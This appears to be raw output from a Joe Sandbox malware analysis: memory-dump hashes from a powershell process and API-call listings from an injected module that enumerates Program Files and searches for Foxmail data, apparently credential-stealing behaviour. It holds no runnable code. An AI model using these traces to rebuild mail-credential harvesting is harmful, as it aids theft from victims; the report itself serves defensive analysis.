                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a35e26a7c2b5329c92e27d424569edd738c2f6c642598d586741a8b693d5fb2c
                      • Instruction ID: 1caa5cb5ed7f95d07189fc00323af615ea93039c0c71ea8792dce4323db8942f
                      • Opcode Fuzzy Hash: a35e26a7c2b5329c92e27d424569edd738c2f6c642598d586741a8b693d5fb2c
                      • Instruction Fuzzy Hash: AC71AF30A01249CFDB14DF68C880A9EFBF6BF85358F248969D455DB7A1DB71AC46CB80
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f1f65c5501279d90a022bb57a5038195b58206a703d1f97e5e963a029a9762c
                      • Instruction ID: de06d78f71cea83438746274932d11fd285fadf8a3f257aef54842b2cc87241d
                      • Opcode Fuzzy Hash: 8f1f65c5501279d90a022bb57a5038195b58206a703d1f97e5e963a029a9762c
                      • Instruction Fuzzy Hash: EC714B30E01248DFDB14DFA5D894BADBBF2BF88348F148469D415AB7A1DB71AC86CB41
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a89350489f48eada17dc27e1b5339ab99ca53fe6c7314a68ef014fdffb3c4f3b
                      • Instruction ID: 190ba3cf6b8d4fa1cf256e26aacab43eda204828357a5e0212e0db5770cc2f88
                      • Opcode Fuzzy Hash: a89350489f48eada17dc27e1b5339ab99ca53fe6c7314a68ef014fdffb3c4f3b
                      • Instruction Fuzzy Hash: 884117F1B00301CFCB248F149501BBEBBA2AF852D4F54896ADD049F6A1DB71D885C7B1
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab15d1610c5cf2a7da52cc8dc82d1663c19454a4f78e9dcdbe0548e72aff17d7
                      • Instruction ID: 0a119caa3de92197d5a9f92d632b0f00ff520acea9dac79df64e093de0a3607d
                      • Opcode Fuzzy Hash: ab15d1610c5cf2a7da52cc8dc82d1663c19454a4f78e9dcdbe0548e72aff17d7
                      • Instruction Fuzzy Hash: 6A417C31A40204CFEB14DB64C598AADBBF2BF89754F18446DE402EB7A1DF359C42CB50
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9856441657e607e8ba5d335041013872dc25193d376b2ae3360b90966bb00eb6
                      • Instruction ID: 15103786ad42089173353f4585570246ae4ca93756abd260ade16a38f23c6e67
                      • Opcode Fuzzy Hash: 9856441657e607e8ba5d335041013872dc25193d376b2ae3360b90966bb00eb6
                      • Instruction Fuzzy Hash: 10414C30E002489FDB14DFA5C844B9DBBF2BF85358F248969D415AB7A1DB71AC46CB81
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d967ce37d23209d848299715ad1600c90d4601cf8713ba36f2d24621457b3230
                      • Instruction ID: 6de7b5e4a00026490dedc751b6a32b6a9fc0a4e5e9573e1431298a52f3545494
                      • Opcode Fuzzy Hash: d967ce37d23209d848299715ad1600c90d4601cf8713ba36f2d24621457b3230
                      • Instruction Fuzzy Hash: A94113B470D3C19FC7178B648855A95BFB1AF83251B2D84DBC844CF1A3D6A68C8BC722
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 086a0c6c30b697299370acc317f7a1b271d8a1d997ed17ef6591bb66dd36b4ed
                      • Instruction ID: f79a630ceb6501df036aaa5db4198a0f7cf11952975e9de323c2be5f24b38260
                      • Opcode Fuzzy Hash: 086a0c6c30b697299370acc317f7a1b271d8a1d997ed17ef6591bb66dd36b4ed
                      • Instruction Fuzzy Hash: AE318B70B003189FE7149B64C854BAE7AA3AF85344F50C429EA056F7D5CF76DC428B91
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c2ea7b4e5a5d0863f0adb63aa96cd7b04b71e54e0f69d1e0cd6219bb81b98a7
                      • Instruction ID: 8ea8498b2afc85c2fa24fc3d30f10a1832abbba086b43c6c7f6d22862248a383
                      • Opcode Fuzzy Hash: 6c2ea7b4e5a5d0863f0adb63aa96cd7b04b71e54e0f69d1e0cd6219bb81b98a7
                      • Instruction Fuzzy Hash: 0421AD75E052559FDB02CF58D8919AABBB4FF4A210B0481DAE805EB3A2C335ED45CBA1
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d920e343c0ba0c9f9506cfe7fe766b0eec4ceeedc834207dc9ddb157eebdfd4
                      • Instruction ID: 13254efcc4429cb9963c50befb7b18c00da3c87d3026b99270f33ba99af74d8c
                      • Opcode Fuzzy Hash: 2d920e343c0ba0c9f9506cfe7fe766b0eec4ceeedc834207dc9ddb157eebdfd4
                      • Instruction Fuzzy Hash: 3A211674A006099FDB04CF89C4909AAFBF1FF48310B158599E949EB761C731EC92CFA5
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6029ac658024e577d3f416361ce3809373459d85741a878fef29772b3599d137
                      • Instruction ID: 01ea0eb2b97a73c7d34792e760625ec22180c7bf1a4720fa004c3a0256c3a8d6
                      • Opcode Fuzzy Hash: 6029ac658024e577d3f416361ce3809373459d85741a878fef29772b3599d137
                      • Instruction Fuzzy Hash: F1210874E042499FDB01DF98C8909AAFBB1FF4A310B158599E849AB352C735ED41CBA1
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1713923029.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_2f9d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34fcd80715c1babeb7e0c795f9f8d1b673a64e8dd238fba92c34df1276e35ca1
                      • Instruction ID: a73ccf490470a0ca1b1c4f0826e1b71038c7be7ec56e695f6a941187f2555d37
                      • Opcode Fuzzy Hash: 34fcd80715c1babeb7e0c795f9f8d1b673a64e8dd238fba92c34df1276e35ca1
                      • Instruction Fuzzy Hash: 0B012B319043049FFB206A11CCC4B67FF98DF41AA5F28C119DE480F196C3799846CBB1
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1713923029.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_2f9d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82feb15078a30daadcc86f60197e02261e2cd489cc20f8e9226d45dd98586295
                      • Instruction ID: 2c5938cbaf0cf4c1693d64f2f5e9342dc1e5ffa4e22fd09216ad55d1a791eb65
                      • Opcode Fuzzy Hash: 82feb15078a30daadcc86f60197e02261e2cd489cc20f8e9226d45dd98586295
                      • Instruction Fuzzy Hash: 92019E7140E3C09FE7168B218C94B52BFB4DF43624F1D80DBD9888F1A7C2695849C772
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (oq$(oq$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq
                      • API String ID: 0-4031905499
                      • Opcode ID: e4ec7ac22103834f2eff7dfd8af0cd661c88a2bc7606cccd3684a393363f46ae
                      • Instruction ID: 31603359aa080f70f3bebdd862e04e73b3804faa0050ab899461520aa4abc967
                      • Opcode Fuzzy Hash: e4ec7ac22103834f2eff7dfd8af0cd661c88a2bc7606cccd3684a393363f46ae
                      • Instruction Fuzzy Hash: 42F1D3B0B00219DFDB24DF68D4457ADBBA2BF89391F248469ED059B350CBB1DC82CB91
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                      • API String ID: 0-4104424984
                      • Opcode ID: 49a54a50a097e665d82ff113388ed36dd2e76ea9bc41a9c0359815123d2f4232
                      • Instruction ID: 958335f9ac1019322ecdc560c1b3e06e0d350f204ccfd6ed85176b7863196bce
                      • Opcode Fuzzy Hash: 49a54a50a097e665d82ff113388ed36dd2e76ea9bc41a9c0359815123d2f4232
                      • Instruction Fuzzy Hash: AEA15CF1B043069FDB284B25985477A7BA1EF826DDF24887ADC05CB2A1DB71DC41C7A1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$tPq$tPq$tPq
                      • API String ID: 0-1844223728
                      • Opcode ID: 51b539614346899f82e3e9b906f4ee5becd8e279394593cc76fe5c4579508cef
                      • Instruction ID: 5443dc916bbce052c7a1c5fecaffdfe496a6cc4e2caab27ae302df60177c8697
                      • Opcode Fuzzy Hash: 51b539614346899f82e3e9b906f4ee5becd8e279394593cc76fe5c4579508cef
                      • Instruction Fuzzy Hash: 50A15FB1B043098FDB20976994417A6BBE2EF85392F58C9AADD06CB241DEB1CC41C7A1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$tPq$$q$$q$$q
                      • API String ID: 0-838716513
                      • Opcode ID: 08c0a0ccb4c3da253b3fb91e858e61563e23c4a3eafedd70af969058c682d811
                      • Instruction ID: 8d13c93f6611f79f2f2a44b4272d78dee791d98ea2548c1ec0669dd3d1f07b4e
                      • Opcode Fuzzy Hash: 08c0a0ccb4c3da253b3fb91e858e61563e23c4a3eafedd70af969058c682d811
                      • Instruction Fuzzy Hash: 23616DF0B10206DFDB248F14C5457AA77A6EF453D5F1889AAEC015F290DBF5EA80CBA1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$tPq$$q$$q$$q
                      • API String ID: 0-838716513
                      • Opcode ID: 9be439e2238a563a35dd9a26ab9561e0990d26c82db8c8cd20d0bd1831967463
                      • Instruction ID: edb21ce06a082eac02f85040680e8b7ae6e64879b7148520213f3780e2c05ca1
                      • Opcode Fuzzy Hash: 9be439e2238a563a35dd9a26ab9561e0990d26c82db8c8cd20d0bd1831967463
                      • Instruction Fuzzy Hash: FE41D2F2A00306EFDB258F14D445BA5B7B1BF453A0F1884AAEC155F293CBB1D941CBA1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$$q$$q$$q
                      • API String ID: 0-170447905
                      • Opcode ID: a5dc5d129dab7376592ff0715d8594d2e2b362cd7d35e3a0485670df4ac04683
                      • Instruction ID: 8a98e296af540caafb6f8d0b076cce4568d2b25fd97cec9c4ef635013f4eca20
                      • Opcode Fuzzy Hash: a5dc5d129dab7376592ff0715d8594d2e2b362cd7d35e3a0485670df4ac04683
                      • Instruction Fuzzy Hash: 82313BB2B04306CFDB354B65A440276B7A3FFC52D6B38887ADD168B141EAB5C472C752
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$$q$$q
                      • API String ID: 0-1195628130
                      • Opcode ID: a557508f6e62b4cac439d49a1dac1c7a924cce137a0ef7de581ad0e8d0907ee0
                      • Instruction ID: 74574c65ec1c93e222139a4101f8826452a3acbe6ce8d0c87bbc82767bb77910
                      • Opcode Fuzzy Hash: a557508f6e62b4cac439d49a1dac1c7a924cce137a0ef7de581ad0e8d0907ee0
                      • Instruction Fuzzy Hash: 70112961B0924A4BD726136938302596F739FC269276E84ABD841CB652CD958C478397
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (oq$(oq$(oq$(oq
                      • API String ID: 0-3853041632
                      • Opcode ID: e4b156f695c72956e4e9cb33591a2cd5642ff2cb033e63b584efa0615d79cd38
                      • Instruction ID: bb8b43e5422075bf7dd2bbfda97e8a56f322ba0bbf200c69941f710a199e39eb
                      • Opcode Fuzzy Hash: e4b156f695c72956e4e9cb33591a2cd5642ff2cb033e63b584efa0615d79cd38
                      • Instruction Fuzzy Hash: 38F15CB1704306DFDB349F68D8847AABBA2FF85391F14886ADD05CB291DBB1D842C761
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$tPq$tPq
                      • API String ID: 0-1392854178
                      • Opcode ID: 2b1f0aba690fce6737b592cf07028725796a9cd0be8392b88fe9945850306903
                      • Instruction ID: f8dd4cdbe6a4d28667ff846d3308051fb857c743eac72455a3947173b1a25260
                      • Opcode Fuzzy Hash: 2b1f0aba690fce6737b592cf07028725796a9cd0be8392b88fe9945850306903
                      • Instruction Fuzzy Hash: 2FA1B1B1A00319DFDB24CF68D584BA9BBB2BF49394F19849AEC059F251C7B1DC81CB91
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $q$$q$$q$$q
                      • API String ID: 0-4102054182
                      • Opcode ID: 91445a9c8925d818c768fc36f510491b2499781d080652d9510fbc45afa9d5a5
                      • Instruction ID: a85d0ffeac6a860886e760b986e2dbc4b51468414d682fc1bde26e424bbc2080
                      • Opcode Fuzzy Hash: 91445a9c8925d818c768fc36f510491b2499781d080652d9510fbc45afa9d5a5
                      • Instruction Fuzzy Hash: A02127F13103069BEB34562AA841727B796BBC53D5F24883AAD05CB3C2DEB5DC418362

                      Execution Graph

                      Execution Coverage: 2.2%
                      Dynamic/Decrypted Code Coverage: 100%
                      Signature Coverage: 5.6%
                      Total number of Nodes: 214
                      Total number of Limit Nodes: 5
6837->6814 6838->6828 6842 245756b9 RtlLeaveCriticalSection 6839->6842 6841 245747e3 6841->6830 6842->6841 6843->6837 6847 24575b7a GetLastError 6844->6847 6848 24575b93 6847->6848 6849 24575b99 6847->6849 6866 24575e08 6848->6866 6853 24575bf0 SetLastError 6849->6853 6873 2457637b 6849->6873 6855 24575bf9 6853->6855 6854 24575bb3 6880 2457571e 6854->6880 6855->6819 6859 24575bcf 6893 2457593c 6859->6893 6860 24575bb9 6862 24575be7 SetLastError 6860->6862 6862->6855 6864 2457571e _free 17 API calls 6865 24575be0 6864->6865 6865->6853 6865->6862 6898 24575c45 6866->6898 6868 24575e2f 6869 24575e47 TlsGetValue 6868->6869 6870 24575e3b 6868->6870 6869->6870 6871 24572ada _ValidateLocalCookies 5 API calls 6870->6871 6872 24575e58 6871->6872 6872->6849 6878 24576388 __dosmaperr 6873->6878 6874 245763c8 6876 24576368 __dosmaperr 19 API calls 6874->6876 6875 245763b3 RtlAllocateHeap 6877 24575bab 6875->6877 6875->6878 6876->6877 6877->6854 6886 24575e5e 6877->6886 6878->6874 6878->6875 6879 2457474f __dosmaperr 7 API calls 6878->6879 6879->6878 6881 24575752 __dosmaperr 6880->6881 6882 24575729 HeapFree 6880->6882 6881->6860 6882->6881 6883 2457573e 6882->6883 6884 24576368 __dosmaperr 18 API calls 6883->6884 6885 24575744 GetLastError 6884->6885 6885->6881 6887 24575c45 __dosmaperr 5 API calls 6886->6887 6888 24575e85 6887->6888 6889 24575ea0 TlsSetValue 6888->6889 6890 24575e94 6888->6890 6889->6890 6891 24572ada _ValidateLocalCookies 5 API calls 6890->6891 6892 24575bc8 6891->6892 6892->6854 6892->6859 6904 24575914 6893->6904 6901 24575c71 6898->6901 6903 24575c75 __crt_fast_encode_pointer 6898->6903 6899 24575c95 6902 24575ca1 GetProcAddress 6899->6902 6899->6903 6900 24575ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6900->6901 6901->6899 6901->6900 6901->6903 6902->6903 6903->6868 6905 24575854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6904->6905 6906 24575938 6905->6906 6907 245758c4 6906->6907 6908 24575758 __dosmaperr 
20 API calls 6907->6908 6909 245758e8 6908->6909 6909->6864 6911 24571ca6 _strlen 6910->6911 6911->6806

                      Control-flow Graph

                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24571137
                      • lstrcatW.KERNEL32(?,?), ref: 24571151
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457115C
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457116D
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457117C
                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24571193
                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 245711D0
                      • FindClose.KERNELBASE(00000000), ref: 245711DB
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                      • String ID:
                      • API String ID: 1083526818-0
                      • Opcode ID: cb0bdcbb3daff22d130ba59ad90c7afd11398beb7f3f76dc5d395ea07abd678f
                      • Instruction ID: 963c07fa4abd70e3bb5bd7f322b8b5ba1e88a337876a686410901505f0ae0789
                      • Opcode Fuzzy Hash: cb0bdcbb3daff22d130ba59ad90c7afd11398beb7f3f76dc5d395ea07abd678f
                      • Instruction Fuzzy Hash: CD2171725043486BD721EA64AC48F9B7BACFF84354F00093AFA98D71D0FB74D6098796

                      Control-flow Graph

                      APIs
                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 24571434
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24571137
                        • Part of subcall function 245710F1: lstrcatW.KERNEL32(?,?), ref: 24571151
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457115C
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457116D
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457117C
                        • Part of subcall function 245710F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24571193
                        • Part of subcall function 245710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 245711D0
                        • Part of subcall function 245710F1: FindClose.KERNELBASE(00000000), ref: 245711DB
                      • lstrlenW.KERNEL32(?), ref: 245714C5
                      • lstrlenW.KERNEL32(?), ref: 245714E0
                      • lstrlenW.KERNEL32(?,?), ref: 2457150F
                      • lstrcatW.KERNEL32(00000000), ref: 24571521
                      • lstrlenW.KERNEL32(?,?), ref: 24571547
                      • lstrcatW.KERNEL32(00000000), ref: 24571553
                      • lstrlenW.KERNEL32(?,?), ref: 24571579
                      • lstrcatW.KERNEL32(00000000), ref: 24571585
                      • lstrlenW.KERNEL32(?,?), ref: 245715AB
                      • lstrcatW.KERNEL32(00000000), ref: 245715B7
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                      • String ID: )$Foxmail$ProgramFiles
                      • API String ID: 672098462-2938083778
                      • Opcode ID: 615908975c1e80270c94215bc1f31bd031e4cfc69bd95f8f6de058cd782a03b5
                      • Instruction ID: ca4a0cd2e78a5a79ceed35fc5a10bedcedc8310d9bebe0922f68534878f5ef42
                      • Opcode Fuzzy Hash: 615908975c1e80270c94215bc1f31bd031e4cfc69bd95f8f6de058cd782a03b5
                      • Instruction Fuzzy Hash: FC81B371A40368AAEB20DBA1DC85FDF777DEF84700F0015A6F508EB194EA715A84CF95

                      Control-flow Graph

                      APIs
                      • GetModuleHandleA.KERNEL32(2457C7DD), ref: 2457C7E6
                      • GetModuleHandleA.KERNEL32(?,2457C7DD), ref: 2457C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2457C860
                        • Part of subcall function 2457C803: GetProcAddress.KERNEL32(00000000,2457C7F4), ref: 2457C804
                        • Part of subcall function 2457C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C816
                        • Part of subcall function 2457C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C82A
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProtectVirtual
                      • String ID:
                      • API String ID: 2099061454-0
                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction ID: f591e041f11fe15d6ccb98a9d1473d3155f08841d2acaea07042f2acf4f42abb
                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction Fuzzy Hash: 27012801A452413CBB1356B42C05EBA5FF8DB67660B101BB6E2C0DB193DAACC606F3F6

                      Control-flow Graph (summary of the viewer's graph data for 2457c7a7): basic blocks 2457c7a7..2457c872; calls 2457c7e6 and 2457c877; API-calling blocks 2457c835 GetModuleHandleA, 2457c800 GetProcAddress, 2457c85f GetProcAddress, 2457c80d VirtualProtect, 2457c81c VirtualProtect; tight loop at 2457c83f.
                      APIs
                      • GetModuleHandleA.KERNEL32(?,2457C7DD), ref: 2457C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2457C860
                        • Part of subcall function 2457C7E6: GetModuleHandleA.KERNEL32(2457C7DD), ref: 2457C7E6
                        • Part of subcall function 2457C7E6: GetProcAddress.KERNEL32(00000000,2457C7F4), ref: 2457C804
                        • Part of subcall function 2457C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C816
                        • Part of subcall function 2457C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C82A
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProtectVirtual
                      • String ID:
                      • API String ID: 2099061454-0
                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction ID: eb949d8d098d7eadea257420c38f4ba49ad6772c817f9cad686235f02c98058f
                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction Fuzzy Hash: 032136224082816FF7138BB46C04BA67FF8DB53260F180AB6D1C0DB143D6ACC546E3A2

                      Control-flow Graph (summary of the viewer's graph data for 2457c803): basic blocks 2457c803..2457c870; call 2457c877 at 2457c872; API-calling blocks 2457c803 GetProcAddress, 2457c80d VirtualProtect, 2457c81c VirtualProtect, 2457c835 GetModuleHandleA, 2457c85f GetProcAddress; tight loop at 2457c83f.
                      APIs
                      • GetProcAddress.KERNEL32(00000000,2457C7F4), ref: 2457C804
                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C816
                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C82A
                      • GetModuleHandleA.KERNEL32(?,2457C7DD), ref: 2457C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2457C860
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressProcProtectVirtual$HandleModule
                      • String ID:
                      • API String ID: 2152742572-0
